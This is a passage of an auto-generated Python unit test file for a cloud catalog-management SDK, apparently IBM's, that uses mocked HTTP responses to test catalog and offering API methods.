feature_model['title'] = 'testString'
feature_model['description'] = 'testString'
# Construct a dict representation of a FilterTerms model
filter_terms_model = {}
filter_terms_model['filter_terms'] = ['testString']
# Construct a dict representation of a CategoryFilter model
category_filter_model = {}
category_filter_model['include'] = True
category_filter_model['filter'] = filter_terms_model
# Construct a dict representation of a IDFilter model
id_filter_model = {}
id_filter_model['include'] = filter_terms_model
id_filter_model['exclude'] = filter_terms_model
# Construct a dict representation of a Filters model
filters_model = {}
filters_model['include_all'] = True
filters_model['category_filters'] = {}
filters_model['id_filters'] = id_filter_model
# Construct a dict representation of a SyndicationCluster model
syndication_cluster_model = {}
syndication_cluster_model['region'] = 'testString'
syndication_cluster_model['id'] = 'testString'
syndication_cluster_model['name'] = 'testString'
syndication_cluster_model['resource_group_name'] = 'testString'
syndication_cluster_model['type'] = 'testString'
syndication_cluster_model['namespaces'] = ['testString']
syndication_cluster_model['all_namespaces'] = True
# Construct a dict representation of a SyndicationHistory model
syndication_history_model = {}
syndication_history_model['namespaces'] = ['testString']
syndication_history_model['clusters'] = [syndication_cluster_model]
syndication_history_model['last_run'] = "2019-01-01T12:00:00Z"
# Construct a dict representation of a SyndicationAuthorization model
syndication_authorization_model = {}
syndication_authorization_model['token'] = 'testString'
syndication_authorization_model['last_run'] = "2019-01-01T12:00:00Z"
# Construct a dict representation of a SyndicationResource model
syndication_resource_model = {}
syndication_resource_model['remove_related_components'] = True
syndication_resource_model['clusters'] = [syndication_cluster_model]
syndication_resource_model['history'] = syndication_history_model
syndication_resource_model['authorization'] = syndication_authorization_model
# Set up parameter values
catalog_identifier = 'testString'
id = 'testString'
rev = 'testString'
label = 'testString'
short_description = 'testString'
catalog_icon_url = 'testString'
tags = ['testString']
features = [feature_model]
disabled = True
resource_group_id = 'testString'
owning_account = 'testString'
catalog_filters = filters_model
syndication_settings = syndication_resource_model
kind = 'testString'
# Invoke method
response = _service.replace_catalog(
catalog_identifier,
id=id,
rev=rev,
label=label,
short_description=short_description,
catalog_icon_url=catalog_icon_url,
tags=tags,
features=features,
disabled=disabled,
resource_group_id=resource_group_id,
owning_account=owning_account,
catalog_filters=catalog_filters,
syndication_settings=syndication_settings,
kind=kind,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate body params
req_body = json.loads(str(responses.calls[0].request.body, 'utf-8'))
assert req_body['id'] == 'testString'
assert req_body['_rev'] == 'testString'
assert req_body['label'] == 'testString'
assert req_body['short_description'] == 'testString'
assert req_body['catalog_icon_url'] == 'testString'
assert req_body['tags'] == ['testString']
assert req_body['features'] == [feature_model]
assert req_body['disabled'] == True
assert req_body['resource_group_id'] == 'testString'
assert req_body['owning_account'] == 'testString'
assert req_body['catalog_filters'] == filters_model
assert req_body['syndication_settings'] == syndication_resource_model
assert req_body['kind'] == 'testString'
@responses.activate
def test_replace_catalog_required_params(self):
"""
test_replace_catalog_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString')
mock_response = '{"id": "id", "_rev": "rev", "label": "label", "short_description": "short_description", "catalog_icon_url": "catalog_icon_url", "tags": ["tags"], "url": "url", "crn": "crn", "offerings_url": "offerings_url", "features": [{"title": "title", "description": "description"}], "disabled": true, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "resource_group_id": "resource_group_id", "owning_account": "owning_account", "catalog_filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}, "syndication_settings": {"remove_related_components": false, "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "history": {"namespaces": ["namespaces"], "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "last_run": "2019-01-01T12:00:00.000Z"}, "authorization": {"token": "token", "last_run": "2019-01-01T12:00:00.000Z"}}, "kind": "kind"}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
# Invoke method
response = _service.replace_catalog(
catalog_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_replace_catalog_value_error(self):
"""
test_replace_catalog_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString')
mock_response = '{"id": "id", "_rev": "rev", "label": "label", "short_description": "short_description", "catalog_icon_url": "catalog_icon_url", "tags": ["tags"], "url": "url", "crn": "crn", "offerings_url": "offerings_url", "features": [{"title": "title", "description": "description"}], "disabled": true, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "resource_group_id": "resource_group_id", "owning_account": "owning_account", "catalog_filters": {"include_all": false, "category_filters": {"mapKey": {"include": false, "filter": {"filter_terms": ["filter_terms"]}}}, "id_filters": {"include": {"filter_terms": ["filter_terms"]}, "exclude": {"filter_terms": ["filter_terms"]}}}, "syndication_settings": {"remove_related_components": false, "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "history": {"namespaces": ["namespaces"], "clusters": [{"region": "region", "id": "id", "name": "name", "resource_group_name": "resource_group_name", "type": "type", "namespaces": ["namespaces"], "all_namespaces": true}], "last_run": "2019-01-01T12:00:00.000Z"}, "authorization": {"token": "token", "last_run": "2019-01-01T12:00:00.000Z"}}, "kind": "kind"}'
responses.add(responses.PUT,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.replace_catalog(**req_copy)
class TestDeleteCatalog():
"""
Test Class for delete_catalog
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_delete_catalog_all_params(self):
"""
delete_catalog()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString')
responses.add(responses.DELETE,
url,
status=200)
# Set up parameter values
catalog_identifier = 'testString'
# Invoke method
response = _service.delete_catalog(
catalog_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_delete_catalog_value_error(self):
"""
test_delete_catalog_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString')
responses.add(responses.DELETE,
url,
status=200)
# Set up parameter values
catalog_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.delete_catalog(**req_copy)
class TestGetCatalogAudit():
"""
Test Class for get_catalog_audit
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_catalog_audit_all_params(self):
"""
get_catalog_audit()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/audit')
mock_response = '{"list": [{"id": "id", "created": "2019-01-01T12:00:00.000Z", "change_type": "change_type", "target_type": "target_type", "target_id": "target_id", "who_delegate_email": "who_delegate_email", "message": "message"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
# Invoke method
response = _service.get_catalog_audit(
catalog_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_get_catalog_audit_value_error(self):
"""
test_get_catalog_audit_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/audit')
mock_response = '{"list": [{"id": "id", "created": "2019-01-01T12:00:00.000Z", "change_type": "change_type", "target_type": "target_type", "target_id": "target_id", "who_delegate_email": "who_delegate_email", "message": "message"}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
# Pass in all but one required param and check for a ValueError
req_param_dict = {
"catalog_identifier": catalog_identifier,
}
for param in req_param_dict.keys():
req_copy = {key:val if key is not param else None for (key,val) in req_param_dict.items()}
with pytest.raises(ValueError):
_service.get_catalog_audit(**req_copy)
# endregion
##############################################################################
# End of Service: Catalogs
##############################################################################
##############################################################################
# Start of Service: Offerings
##############################################################################
# region
class TestGetConsumptionOfferings():
"""
Test Class for get_consumption_offerings
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_get_consumption_offerings_all_params(self):
"""
get_consumption_offerings()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/offerings')
mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
digest = True
catalog = 'testString'
select = 'all'
include_hidden = True
limit = 1000
offset = 38
# Invoke method
response = _service.get_consumption_offerings(
digest=digest,
catalog=catalog,
select=select,
include_hidden=include_hidden,
limit=limit,
offset=offset,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'digest={}'.format('true' if digest else 'false') in query_string
assert 'catalog={}'.format(catalog) in query_string
assert 'select={}'.format(select) in query_string
assert 'includeHidden={}'.format('true' if include_hidden else 'false') in query_string
assert 'limit={}'.format(limit) in query_string
assert 'offset={}'.format(offset) in query_string
@responses.activate
def test_get_consumption_offerings_required_params(self):
"""
test_get_consumption_offerings_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/offerings')
mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Invoke method
response = _service.get_consumption_offerings()
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
class TestListOfferings():
"""
Test Class for list_offerings
"""
def preprocess_url(self, request_url: str):
"""
Preprocess the request URL to ensure the mock response will be found.
"""
if re.fullmatch('.*/+', request_url) is None:
return request_url
else:
return re.compile(request_url.rstrip('/') + '/+')
@responses.activate
def test_list_offerings_all_params(self):
"""
list_offerings()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings')
mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
digest = True
limit = 1000
offset = 38
name = 'testString'
sort = 'testString'
# Invoke method
response = _service.list_offerings(
catalog_identifier,
digest=digest,
limit=limit,
offset=offset,
name=name,
sort=sort,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
# Validate query params
query_string = responses.calls[0].request.url.split('?',1)[1]
query_string = urllib.parse.unquote_plus(query_string)
assert 'digest={}'.format('true' if digest else 'false') in query_string
assert 'limit={}'.format(limit) in query_string
assert 'offset={}'.format(offset) in query_string
assert 'name={}'.format(name) in query_string
assert 'sort={}'.format(sort) in query_string
@responses.activate
def test_list_offerings_required_params(self):
"""
test_list_offerings_required_params()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings')
mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": {"token": "token", "type": "type"}}]}'
responses.add(responses.GET,
url,
body=mock_response,
content_type='application/json',
status=200)
# Set up parameter values
catalog_identifier = 'testString'
# Invoke method
response = _service.list_offerings(
catalog_identifier,
headers={}
)
# Check for correct operation
assert len(responses.calls) == 1
assert response.status_code == 200
@responses.activate
def test_list_offerings_value_error(self):
"""
test_list_offerings_value_error()
"""
# Set up mock
url = self.preprocess_url(_base_url + '/catalogs/testString/offerings')
mock_response = '{"offset": 6, "limit": 5, "total_count": 11, "resource_count": 14, "first": "first", "last": "last", "prev": "prev", "next": "next", "resources": [{"id": "id", "_rev": "rev", "url": "url", "crn": "crn", "label": "label", "name": "name", "offering_icon_url": "offering_icon_url", "offering_docs_url": "offering_docs_url", "offering_support_url": "offering_support_url", "tags": ["tags"], "keywords": ["keywords"], "rating": {"one_star_count": 14, "two_star_count": 14, "three_star_count": 16, "four_star_count": 15}, "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "short_description": "short_description", "long_description": "long_description", "features": [{"title": "title", "description": "description"}], "kinds": [{"id": "id", "format_kind": "format_kind", "target_kind": "target_kind", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "install_description": "install_description", "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "versions": [{"id": "id", "_rev": "rev", "crn": "crn", "version": "version", "sha": "sha", "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "offering_id": "offering_id", "catalog_id": "catalog_id", "kind_id": "kind_id", "tags": ["tags"], "repo_url": "repo_url", "source_url": "source_url", "tgz_url": "tgz_url", "configuration": [{"key": "key", "type": "type", "default_value": {"anyKey": "anyValue"}, "value_constraint": "value_constraint", "description": "description", "required": true, "options": [{"anyKey": "anyValue"}], "hidden": true}], "metadata": {"mapKey": {"anyKey": "anyValue"}}, "validation": {"validated": "2019-01-01T12:00:00.000Z", "requested": "2019-01-01T12:00:00.000Z", "state": "state", "last_operation": "last_operation", "target": {"mapKey": {"anyKey": "anyValue"}}}, "required_resources": [{"type": "mem", "value": {"anyKey": "anyValue"}}], "single_instance": false, "install": {"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}, "pre_install": [{"instructions": "instructions", "script": "script", "script_permission": "script_permission", "delete_script": "delete_script", "scope": "scope"}], "entitlement": {"provider_name": "provider_name", "provider_id": "provider_id", "product_id": "product_id", "part_numbers": ["part_numbers"], "image_repo_name": "image_repo_name"}, "licenses": [{"id": "id", "name": "name", "type": "type", "url": "url", "description": "description"}], "image_manifest_url": "image_manifest_url", "deprecated": true, "package_version": "package_version", "state": {"current": "current", "current_entered": "2019-01-01T12:00:00.000Z", "pending": "pending", "pending_requested": "2019-01-01T12:00:00.000Z", "previous": "previous"}, "version_locator": "version_locator", "console_url": "console_url", "long_description": "long_description", "whitelisted_accounts": ["whitelisted_accounts"]}], "plans": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "additional_features": [{"title": "title", "description": "description"}], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z", "deployments": [{"id": "id", "label": "label", "name": "name", "short_description": "short_description", "long_description": "long_description", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "tags": ["tags"], "created": "2019-01-01T12:00:00.000Z", "updated": "2019-01-01T12:00:00.000Z"}]}]}], "permit_request_ibm_public_publish": false, "ibm_publish_approved": true, "public_publish_approved": false, "public_original_crn": "public_original_crn", "publish_public_crn": "publish_public_crn", "portal_approval_record": "portal_approval_record", "portal_ui_url": "portal_ui_url", "catalog_id": "catalog_id", "catalog_name": "catalog_name", "metadata": {"mapKey": {"anyKey": "anyValue"}}, "disclaimer": "disclaimer", "hidden": true, "provider": "provider", "repo_info": 